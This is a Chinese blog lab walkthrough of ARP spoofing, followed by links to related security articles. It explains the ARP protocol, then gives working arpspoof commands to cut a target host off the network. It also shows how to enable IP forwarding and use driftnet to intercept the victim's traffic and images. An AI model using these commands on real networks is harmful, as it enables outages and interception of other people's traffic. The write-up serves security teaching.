Arp欺骗断网/获取流量演练

最新推荐文章于 2023-12-27 21:53:30 发布
最新推荐文章于 2023-12-27 21:53:30 发布
阅读量642 收藏 5
点赞数
分类专栏: 渗透测试 Kali渗透 文章标签: 网络 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weare001/article/details/124838050
版权
本文详细介绍了ARP协议的工作原理及其在网络通信中的作用,重点阐述了ARP欺骗的概念和实施方式。通过实例展示了如何使用arpspoof工具进行断网攻击和数据截取,揭示了这种攻击手段的隐蔽性和危害性。同时,提到了开启IP转发和使用driftnet工具在攻击过程中捕获流量数据的步骤,提醒读者关注网络安全并采取相应防护措施。
摘要由CSDN通过智能技术生成

前言

ARP协议

        在局域网中,网络中实际传输的是“帧”,帧里面是有目标主机的MAC地址的。在以太网中,一个主机要和另一个主机进行直接通信,必须要知道目标主机的MAC地址。MAC地址就是ARP协议获得的。其实就是主机在发送帧前将目标IP地址转换成目标MAC地址的过程。ARP协议的基本功能就是通过目标设备的IP地址,查询目标设备的MAC地址,以保证通信的顺利进行。所以说从某种意义上讲ARP协议是工作在更低于IP协议的协议层。这也是为什么ARP欺骗更能够让人在神不知鬼不觉的情况下出现网络故障,危害会很隐蔽。

ARP欺骗原理

        ARP攻击就是通过伪造IP地址和MAC地址实现ARP欺骗,能够在网络中产生大量的ARP通信量,攻击者只要持续不断的发出伪造的ARP响应包就能更改目标主机ARP缓存中的IP-MAC条目,造成网络中断或中间人攻击。

当局域网中一台机器,反复向其他机器,特别是向网关,发送这样无效假冒的ARP应答信息包时,严重的网络堵塞就会开始。由于网关MAC地址错误,所以从网络中计算机发来的数据无法正常发到网关,自然无法正常上网。这就造成了无法访问外网的问题,由于很多时候网关还控制着我们的局域网LAN上网,所以这时我们的LAN访问也就出现问题了。

复现过程

攻击机:172.16.20.78

目标机:172.16.20.105

一、断网攻击

1、可以使用nmap命令寻找存活主机,且查看**.105是可以正常上网的;

2、开始断网攻击;

arpspoof -i 网卡 -t 目标IP 网关

若kali中找不到arpspoof,则需要下载;

apt-get install dsniff ssldump

3、输入命令使主机**.105断网

arpspoof -i eth0 -t 172.16.20.105 172.16.20.1

4、停止使用工具后,目标主机恢复网络

二、利用arpspoof工具和driftnet工具进行ARP欺骗(截获图片)

1、在进行ARP欺骗前,得先打开攻击主机的IP转发功能,linux因为系统安全考虑,是不支持IP转发的,其配置文件写在/proc/sys/net/ipv4的ip_forward中。默认为0,接下来修改为1。

echo 1 > /proc/sys/net/ipv4/ip_forward

2、相同的方法对目标主机**.105发起Arp欺骗;用目标机ping百度依旧可以ping通;

arpspoof -i eth0 -t 172.16.20.105 172.16.20.1

3、此时,物理机和网关通信的数据包都会流经虚拟机,那么可以在虚拟机中利用driftnet工具,可以捕获物理机正在浏览的图片。在虚拟机中打开driftnet。

若没有driftnet就下载

apt-get install driftnet

因为我的目标及是centos没法浏览图片,但是原理是一样的

更多安全分享,请关注【安全info】微信公众号!

流浪法师12
关注
专栏目录
[网络安全自学篇] 七十三.WannaCry勒索病毒复现及分析(四)蠕虫传播机制全网源码详细解读
杨秀璋的专栏
05-05 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了逆向分析OllyDbg动态调试工具的基本用法,包括界面介绍、常用快捷键和TraceMe案例分析。这篇文章将继续详细讲解WannaCry蠕虫的传播机制,带领大家详细阅读源代码,分享WannaCry勒索病毒是如何传播感染的。作者分析该病毒一个月,一方面觉得自己技术菜,另一方面深知系统安全需要坚持,继续加油。希望文章对您有所帮助~
黑客攻防与网络安全-N-0
weixin_46571036的博客
07-20 1665
章1 入门 黑客:通过攻击来研究漏洞,从而提高系统的安全性 相关术语: 1.肉鸡:(比喻)指代哪些能够被黑客随意操纵的计算机,可以是windows、UNIX、Linux系统,可以是一般的个人计算机,也可以是大型的服务器,并不被对方发觉。 2.木马:伪装成正常的程序,当程序运行时可获得整个系统的运行权限,如灰鸽子、黑洞、PcShare等。 3.网页木马:伪装成一般的网页文件或者将木马代码插入到正常的网页文件中,当访问时,网页木马就会运用对方系统的漏洞主动将配置好的木马客户端下载到对方的计算机上主动运行,从而控
某邮网络攻防实验:ARP欺骗及检测(2020.11.9)
weixin_51033135的博客
11-09 4464
网络攻防实验:ARP欺骗及检测ARP欺骗原理实验准备ARP断网攻击ARP欺骗及检测 ARP欺骗原理 目前我们的电脑想要上网都需要连局域网,都要通过网关,所谓arp欺骗就是让目标主机误以为攻击者的电脑就是网关,从而实现对目标机的断网或监视。 实验准备 友情提醒:如果你使用的是校园网,请默默换上你的手机热点,因为大部分校园网都带有ap隔离,会影响你的实验。 一台linux虚拟机作为攻击机(kali ubtun系统都可),这里我使用的是ubtun,ip为192.168.43.121,mac地址为00-0c-29-
ARP欺骗——断网攻击
qq_57040032的博客
08-30 4814
准备: 1.kali虚拟机(我用的2021.1版本,其它版本也可以) 2.在同一个局域网(比如同一个wifi) 操作:(本次以自己的物理机为例!) 首先,你要确定kali和被攻击的电脑在同一个局域网内 打开kali,终端输入 ifconfig,查看kali的IP地址 如下图 然后查看自己物理机的IP地址,方法如下: 打开控制面板 → 网络和Internet → 网络和共享中心 → 更改适配器设置 → 选择你连接的局域网(或者wifi)双击打开 → 详细信息 这里可以发现kali的I
ARP欺骗断网测试)
最新发布
2301_81475812的博客
12-27 812
1. 软件:VMware Workstations14以上版本2. 虚拟机:Kali-Linux、Windows 71) 打开虚拟机:启动kali-linux 启动windows7(未装补丁)2) 获取IP地址(ifconfig、ipconfig)
检测 ARP 欺骗
ITmoster的博客
06-20 2703
OpUtils 提供高级IP地址管理和交换机端口映射功能,使管理员能够确保无缝联网。借助其恶意检测和预防模块,网络管理员能够识别、检查和处理入侵其网络的恶意设备,网络管理员可以远离恶意设备,不仅仅是ARP欺骗检测功能。
ARP 断网测试
ClassPtr的博客
03-02 377
1.实验材料 1. 笔记本电脑,配置如下: 电脑品牌:华硕 ASUS 系统版本:Microsoft Windows 专业版 [版本 10.0.17134.1069] 笔记本电脑通过 Wifi 连接入互联网。 2. PyCharm 软件,配置如下: 版本:PyCharm 2018.3.3 (Community Edition) Build #PC-183.5153.39, built...
掌握arp欺骗攻击:通过ensp和kali进行网络攻击演练
流量窃取是通过ARP欺骗获取网络中传输的数据包,然后通过嗅探工具(如tcpdump或wireshark)对数据包进行分析,从而获取用户的敏感信息。断网攻击则是通过ARP欺骗使得目标设备无法正常与网关通信,导致该设备无法上网...
信息安全工程师第二版考试总结+笔记
热门推荐
IT技术
11-29 2万+
信息安全工程师第二版考试总结+笔记
网安基础词汇
weixin_46809039的博客
11-13 3598
网安基础词汇 攻击篇 攻击方法 攻击者 文章目录网安基础词汇攻击篇**攻击工具****肉鸡:**僵尸网络:木马:网页木马:Rootkit :蠕虫病毒:震网病毒:勒索病毒:挖矿木马:攻击载荷:嗅探器(sniffer):恶意软件:间谍软件:后门:弱口令:漏洞:远程命令执行漏洞:0day漏洞:1day漏洞:Nday漏洞:攻击方法挂马:挖洞:加壳:溢出:缓冲区溢出:注入:SQL注入:注入点:软件脱壳:免杀:暴力破解:洪水攻击:syn攻击:Dos攻击:DDos攻击:抓鸡:端口扫描:花指令:反弹端口:网络钓鱼:鱼叉
ARP欺骗原理分析与攻防实战演练
12-17
ARP欺骗原理分析与攻防实战演练, 做工精细的PPT, 简单讲解ARP原理和协议等
测试断网方法
weixin_30924239的博客
08-30 2061
1.一键断网一键恢复网络 下载地址:http://www.downxia.com/downinfo/206088.html 二、可定时断网开启,使用bat服务 以太网命令:https://blog.51cto.com/tianma3798/1398637 本地连接命令:https://zhidao.baidu.com/question/195206421037472...
断网测试
frank_20080215的专栏
01-02 558
俄罗斯刚进行过断网测试,结果成功。我们可能在不久的将来也可能会进行断网测试的规划和实施。
断网检测
jiandan1127的博客
02-28 2291
/** * 检测断网 */ let EventUtil = { addHandler: (element, type, handler) => { if (element.addEventListener) { element.addEventListener(type, handler, false); } else i...
网络安全测试---ARP欺骗
qq_55189924的博客
05-23 1826
网络安全测试之ARP欺骗
ARP欺骗攻击的检测和防御
落涯1433
02-28 5268
以太网构建由 1500 个字节的块组成的数据帧。每个以太网数据帧头包括源 MAC 地址和 目的 MAC 地址。建造以太网数据帧,必须从 IP 数据包中开始。但在构建过程中,以太网并 不知道目标机器的MAC 地址,这就需要创建以太网头。唯一可用的信息就是数据包头中的目 标 IP地址。对于特定主机的数据包传输,以太网协议必须利用目标IP来查找目标MAC地址。 这就是 ARP地址解析协议。ARP
使用wireshark进行arp欺骗检测
不忘初心,护天下安全!
11-22 8607
想要检测arp欺骗,就必须再次温习一下arp欺骗的原理和细节。 ARP欺骗(英语:ARP spoofing),又称ARP毒化(ARP poisoning,网上上多译为ARP病毒)或ARP攻击,是针对以太网地址解析协议(ARP)的一种攻击技术,通过欺骗局域网内访问者PC的网关MAC地址,使访问者PC错以为攻击者更改后的MAC地址是网关的MAC,导致网络不通。此种攻击可让攻击者获取局域网上的数据包甚...
Arp断网实验
NSQ0207的博客
07-18 284
arpspoof的命令格式为:arpspoof -i 网卡 -t 目标ip 网关。如果把1改为0,则为关闭,靶机的数据包发不出去,则会使靶机断网。实验工具:Arpspoof、WireShark。命令:ipconfig/ifconfig。在进行ARP欺骗前需要打开arp转发命令。三、利用工具arpspoof实现断网。网关:192.168.154.2。命令:route -n。
渗透测试实战之ARP欺骗攻击(ARP断网攻击和流量转发)
z_s_s_f的博客
12-17 4280
抓取图片以及http、https协议的用户名和密码,使用arpspoof、sslstrip、driftnet和ettercap这四个工具他们的关系与执行顺序是什么样的。
kali linuxarp欺骗 断网
06-06
Kali Linux可以使用ARP欺骗技术来进行网络攻击,这种攻击方式可以让攻击者伪装成网络中的其他设备,从而获取目标设备的网络流量和敏感信息。同时,Kali Linux也可以使用断网技术来阻止目标设备的网络连接,从而达到...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

流浪法师12

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值